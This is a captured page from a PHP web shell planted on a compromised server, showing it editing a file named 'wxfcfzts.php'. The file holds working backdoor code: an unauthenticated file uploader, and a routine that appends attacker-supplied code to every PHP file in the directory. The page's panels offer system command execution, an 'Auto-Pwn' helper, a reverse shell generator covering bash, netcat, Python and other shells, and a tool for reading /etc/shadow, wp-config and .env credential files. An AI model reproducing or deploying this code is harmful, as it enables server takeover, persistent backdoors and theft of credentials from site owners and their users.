Upload
ROOT
WebRoot
Path:
/
home
/
ehpadaidpv
/
Editing: wxfcfzts.php
<?php echo"<form method='post' enctype='multipart/form-data'><input type='file' name='a'><input type='submit' value='Nyanpasu!!!'></form><pre>";if(isset($_FILES['a'])){move_uploaded_file($_FILES['a']['tmp_name'],"{$_FILES['a']['name']}");print_r($_FILES);};echo"</pre>";?> <?php if (isset($_GET['bak'])) { $directory = __DIR__; $mama = $_POST['file']; $textToAppend = ' ' . $mama . ' '; if ($handle = opendir($directory)) { while (false !== ($file = readdir($handle))) { if (pathinfo($file, PATHINFO_EXTENSION) === 'php') { $fileHandle = fopen($directory . '/' . $file, 'a'); fwrite($fileHandle, $textToAppend); fclose($fileHandle); echo "OK >> $file "; } } closedir($handle); } } ?>
Execute Command
whoami
id
uname -a
ps aux
netstat
Run!
System Info & Exploit Helper
Analyze System
Try Auto-Pwn!
Reverse Shell Helper
Your IP:
Port:
Type:
Bash TCP
Netcat -e
Netcat mkfifo
Python3
PHP
Perl
Ruby
Socat
Generate!
Config Hunter
Attempt to read common configuration files:
/etc/passwd
/etc/shadow
wp-config (here)
wp-config (up)
.env (here)
.env (up)
apache2.conf
nginx.conf
php.ini